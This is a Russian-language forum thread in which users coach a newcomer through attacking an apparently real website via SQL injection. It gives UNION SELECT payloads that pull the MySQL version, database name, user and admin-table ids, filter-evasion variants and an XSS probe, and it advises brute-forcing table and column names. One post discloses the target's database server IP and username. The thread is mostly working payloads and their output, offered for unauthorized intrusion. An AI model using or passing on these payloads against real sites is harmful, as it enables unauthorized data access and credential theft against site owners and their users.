я думаю речь идет не про метод PUT, а про фтпшную комманду PUT и суть уязвимости в том, что с помощью ../../ можно выйти из родительского каталога и записать файл ну например в корень серва, если конечно права позволят, это мое предположение и я могу ошибаться
ребята, после изучений нескольких статей, хотел пробовать в деле, и в одном сайте по запросу: Code: http://www.site.ru/vn84.php?id=’ OR ’1’=’1’ Выдает такая ошибка: Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '™ OR ’1’=’1В’ AND status = '1'' at line 2 на сколько это серьезная ошибка и можно ли раскрутить это дальше ? а если например перенаправить (http://www.site.ru/vn84.php?id=http://www.ya.ru/) на yandex.ru, то получается такая ошибка: Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://www.ya.ru/ AND status = '1'' at line 2
2B1t.exe Code: id=-1 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,version())+--+ мне кажется там можно замутить инклюд или читалку файлов
Scipio угу. теперь вроде версия да появился ? Code: http://www.site.ru/vn84.php?id=id=-1 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14, concat(0x27,version())+--+ выдает: Code: error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '4.1.22'' at line 2 получется иммем MySQL версии 4.1.22 ?
2B1t.exe Code: id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,id)+from+admin+limit+0,1+--+
z00MAN че-то не каннает ! делаю такой запрос: Code: http://www.site.ru/index.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,id)+from+admin+limit+0,1+--+ но получаю такое: Code: error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 2
2B1t.exe попробуй вместо + использовать /**/ или в конеце вместо -- ставить например /* или вместо -1 поставь 9999999999 или 1' пробуй разные вариаты...
Adm1n4eG пробовал все варинаты и все выдали один и тот же сообшение, что и написал в предыдышем посте ! вот только при запросе: http://www.site.ru/index.php?id=1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat(0x27,id)+from+admin+limit+0,1+--+ получил уже такое жель не знаю как юзать дальше... ------- Кстати, если ввести такое: http://www.site.ru/index.php?id=subHeader=<script>alert(Hello)</ script>, то получаеться такая картина И как я понял - это говорит о потенциальном XSS опасности.
Tсли есть вывод из sql-inj данных на страницу(ну блин, любую строку можно внедрить в html а броузер потом её обработает), то всегда есть опасность xss. в твоем случае я вижу обрезание тега <script>
а тут не получиться использовать тогда php или SQL инексии? а то XSS_ом возится бесполезно. ничего интересного не получу.
Ну тут скуля, тебе ж уже отписали выше http://www.ru/vn84.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,concat_ws(0x2F,version(),database(),user()))+from+admin+limit+0,1--+ 4.1.22/cctvline_dbb/[email protected] Подбирай названия столбцов таблицы admin
ElteRUS ого )) спасибо. получил точно такое: '4.1.22/cctvline_dbb/[email protected]'' Не хочу выгядеть тупым, но не знаю я парвильно думаю? 4.1.22 - version cctvline_dbb - database [email protected] - user ?? (хотя тут не очень понимаю как так) а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin? получается, что blind SQL ? а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
Я думал,у тебядве ощибки вместе было(про тфтп и эту хрень).Значит,у меня было что-то другое.Без скрина всё равно не пойму).
Ты не видишь в какой они последовательности написанны при sql инъекции? И что тут не понятного... Быть может они предположили и попробовали?! Такой метод называется ручной брут... Какой ещё блайнд? Вывод на месте... Ручной брут + процесс можно автоматизировать, иногда в зависимости от особенности основного запроса можно узнать таблицы при помощи procedure analise() и т.д. и т.п.
Просто MySQL-сервер установлен не на локалхосте, а на удаленной машине. MySQL-сервер имеет адрес Code: 212.193.224.223 и имя пользователя, используемого при коннекте Code: cctvline_cctv Так как 4 версия мускула, то таблиц INFORMATION_SCHEMA нет, следовательно таблицы и колонки узнать можно только брутом(ручным или же разными скриптами, которые выкладывали в кодинге. Вроде SIPT тоже умеет)